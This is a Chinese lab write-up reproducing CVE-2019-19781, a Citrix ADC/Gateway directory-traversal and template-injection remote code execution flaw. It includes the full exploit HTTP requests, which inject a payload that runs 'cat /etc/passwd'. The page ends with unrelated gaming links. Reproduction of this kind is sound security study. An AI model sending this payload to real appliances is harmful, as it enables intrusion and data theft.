■CVE-2019-19781: Citrix ADC远程代码执行漏洞本地复现
No.1声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失 , 均由使用者本人负责 , 雷神众测以及文章作者不为此承担任何责任 。雷神众测拥有对此文章的修改和解释权 。 如欲转载或传播此文章 , 必须保证此文章的完整性 , 包括版权声明等全部内容 。 未经雷神众测允许 , 不得任意修改或者增减此文章内容 , 不得以任何方式将其用于商业目的 。
No.2漏洞产生原因
Citrix ADC(NetScalers)中的目录穿越错误 , 这个错误会调用perl脚本 , perl脚本用于将XML格式的文件附加到受害计算机 , 因此产生远程执行代码 。 注:Citrix NetScaler ADC应用交付控制器和Citrix NetScaler网关
No.3漏洞利用过程
1.pl文件未对NSC_USER参数传入进行过滤2.触发目录穿越3.在模板目录的XML文件写入命令4.模板引擎分析后执行命令
No.4漏洞影响范围
Citrix NetScaler ADC and NetScaler Gateway version 10.5Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 Citrix ADC and Citrix Gateway version 13.0
No.5漏洞复现
下载 Citrix Gateway VPX for ESX Build 13.0-47.22https://www.citrix.com/downloads/citrix-gateway/
本文插图
安装NSVPX-ESX运行.ovf文件后 , 会导入.vmdk文件并启动虚拟机
本文插图
桥接模式 配置IP地址:192.168.2.170子网掩码:255.255.255.0网关地址:192.169.2.255然后选择4确认
本文插图
访问 http://192.168.2.170默认用户和密码登录:nsroot/nsroot
本文插图
利用目录穿越写入命令语句到newbm.pl文件中
本文插图
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Host: 192.168.2.170User-Agent: 1Connection: closeNSC_USER: ../../../netscaler/portal/templates/rab3itNSC_NONCE: nsrootContent-Length: 97url=http://example.com&title=rab3it&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]
HTTP/1.1 200 OKDate: Thu, 16 Jan 2020 06:25:07 GMTServer: ApacheX-Frame-Options: SAMEORIGINLast-Modified: Thu, 16 Jan 2020 06:25:07 GMTETag: W/''87-59c4286dda300''Accept-Ranges: bytesContent-Length: 135X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffKeep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8<HTML><BODY><SCRIPT language=javascript type=text/javascript>//parent.window.ns_reload();window.close();</SCRIPT></BODY></HTML>
GET方式访问写入的xml文件
本文插图
GET /vpn/../vpns/portal/rab3it.xml HTTP/1.1Host: 192.168.2.170User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.3Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeNSC_USER: nsrootNSC_NONCE: nsrootUpgrade-Insecure-Requests: 1Cache-Control: max-age=0
推荐阅读
- 「育儿小手册」狗头成T1级辅助,ADC的春天终于来了,LOL:男刀伤害被砍
- [大司马解说]英雄联盟:有阿水的TES能否进一线强队?网友:冠军ADC都不行!
- 「逍遥电竞」版本T1级ADC搭配上这个辅助下路更强力!,LOL:女枪10.6依旧强势
- 『红海谈娱乐』看似削弱实则加强,ADC玩家已懵逼,LOL男刀迎来“最可笑”削弱
- Broadcasts▲美国:比尔·盖茨就特朗普不当言论发声
- 「Uzi」UZI喊话LOL设计师:ADC攻速比大树还慢,求求你当个人吧!
- theshy■TheShy一局奥恩诞生三个名场面!一打四单杀ADC,还在泉水前挂机
- 「adc」LOL新版本T0上单预定,“45%破甲”让他伤害翻倍,ADC已经彻底绝望!
- 「adc」LOL:四十分钟后最强ADC?VN不行,装备再好的小炮也打不过图4
- 「Broadcasts」美国:比尔·盖茨就特朗普不当言论发声